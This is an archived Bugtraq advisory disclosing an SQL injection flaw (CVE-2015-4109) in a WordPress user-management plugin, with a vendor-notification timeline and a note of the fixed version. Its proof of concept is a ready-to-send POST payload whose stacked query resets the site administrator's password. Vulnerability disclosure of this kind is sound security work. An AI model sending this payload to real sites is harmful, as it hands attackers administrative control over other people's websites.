[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]
From: pan.vagenas@xxxxxxxxx
Date: Fri, 5 Jun 2015 16:58:41 GMT

# Exploit Title: CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]
# Date: 2015/05/30
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://usersultra.com
# Software Link: https://wordpress.org/plugins/users-ultra/
# Version: 1.5.15
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4109

One can perform an SQL injection attack simply by exploiting 
wp_ajax_nopriv_rating_vote action.
POST parameters data_target and data_vote can be used to execute arbitrary SQL 
commands in the database.

In the following PoC we change the administrators password to '1'  so a 
malicious user can then login as the administrator, taking full control of the 
website.

* Send a post request to 
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: 
action=rating_vote&data_id=1
&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1)  where ID 
&data_vote=1
* Login with administrator's user name and password '1'

Note that we assume that table name prefix is 'wp' and administrators user id 
is 1, a very common scenario.

* Timeline
2015-05-29 Discovered
2015-05-30 Vendor notified via contact form
2015-06-01 Vendor notified via email
2015-06-02 Vendor notified via support forums at wordpress.org
2015-06-02 Vendor responded
2015-06-04 Fix released in version 1.5.16

Prev by Date: 1 Click Extract Audio v2.3.6 - Activex Buffer Overflow
Next by Date: Expedia Product Security Advisory: Cruise Ship Centers Information Disclosure
Previous by thread: 1 Click Extract Audio v2.3.6 - Activex Buffer Overflow
Next by thread: Expedia Product Security Advisory: Cruise Ship Centers Information Disclosure
Index(es):
- Date
- Thread